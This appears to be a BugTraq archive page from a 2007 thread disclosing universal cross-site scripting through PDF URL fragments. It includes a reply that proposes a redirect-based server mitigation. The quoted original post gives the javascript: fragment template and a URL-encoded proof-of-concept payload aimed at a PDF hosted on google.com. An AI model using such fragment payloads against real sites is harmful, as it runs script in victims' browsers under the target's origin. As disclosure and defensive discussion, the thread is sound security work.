|
|
BugTraq
Universal XSS with PDF files: highly dangerous Jan 03 2007 02:20AM pdp (architect) (pdp gnucitizen googlemail com) (5 replies) Re: Universal XSS with PDF files: highly dangerous Jan 08 2007 07:27PM The Anarcat (anarcat anarcat ath cx) Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous Jan 03 2007 09:54PM Jean-Jacques Halans (halans gmail com) (2 replies) Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous Jan 04 2007 12:44AM Jim Manico (jim manico net) (1 replies) Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous Jan 04 2007 01:08AM RSnake (rsnake shocking com) RE: [WEB SECURITY] Universal XSS with PDF files: highly dangerous Jan 03 2007 11:22PM Larry Seltzer (Larry larryseltzer com) Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous Jan 03 2007 08:37AM sven vetsch disenchant ch (2 replies) Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous Jan 03 2007 10:27AM pdp (architect) (pdp gnucitizen googlemail com) Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous Jan 03 2007 05:17AM Amit Klein (aksecurity gmail com) (1 replies) Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous Jan 03 2007 06:15PM Amit Klein (aksecurity gmail com) (1 replies) Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous Jan 03 2007 10:03PM pdp (architect) (pdp gnucitizen googlemail com) |
|
Privacy Statement |
As the server side solution, force rewriting fragment identifiers in URI by
redirecion responce can be considered.
Disallow the directoly access to PDF on the server and return response such as:
--
Location: http://example.com/one-shot-url.pdf#top
--
As a result, fragment identifiers in URI is rewritten and executing
malicious script
can be prevented.
"one-shot-url" must be unpredictable disposable address by attacker.
Regards,
On 1/3/07, pdp (architect) <pdp.gnucitizen (at) googlemail (dot) com [email concealed]> wrote:
> I will be very quick and just point to links where you can read about
> this issue.
>
> It seams that PDF documents can execute JavaScript code for no
> apparent reason by using the following template:
>
> http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_
here
>
> You must understand that the attacker doesn't need to have write
> access to the specified PDF document. In order to get an XSS vector
> working you need to have a PDF file hosted on the target and that's
> all about it. The rest is just a matter of your abilities and desires.
>
> This finding was originally mentioned by Sven Vetsch, on his blog.
> This is a very good and quite interesting. Good work.
>
> There is a POC I composed:
>
> http://www.google.com/librariancenter/downloads/Tips_Tricks_85x11.pdf#so
mething=javascript:function%20createXMLHttpRequest(){%20%20%20try{%20ret
urn%20new%20ActiveXObject('Msxml2.XMLHTTP');%20}catch(e){}%20%20%20try{%
20return%20new%20ActiveXObject('Microsoft.XMLHTTP');%20}catch(e){}%20%20
%20try{%20return%20new%20XMLHttpRequest();%20}catch(e){}%20%20%20return%
20null;}var%20xhr%20=%20createXMLHttpRequest();xhr.onreadystatechange%20
=%20function(){%20%20%20%20if%20(xhr.readyState%20==%204)%20%20%20%20%20
%20%20%20alert(xhr.responseText);};xhr.open('GET',%20'http://www.google.
com',%20true);xhr.send(null);
>
> More on the matter can be found here:
>
> http://www.gnucitizen.org/blog/danger-danger-danger/
> http://www.disenchant.ch/blog/hacking-with-browser-plugins/34
>
> --
> pdp (architect) | petko d. petkov
> http://www.gnucitizen.org
>
> ------------------------------------------------------------------------
----
> The Web Security Mailing List:
> http://www.webappsec.org/lists/websecurity/
>
> The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
>
--
HASEGAWA Yosuke
yosuke.hasegawa (at) gmail (dot) com [email concealed]
[ reply ]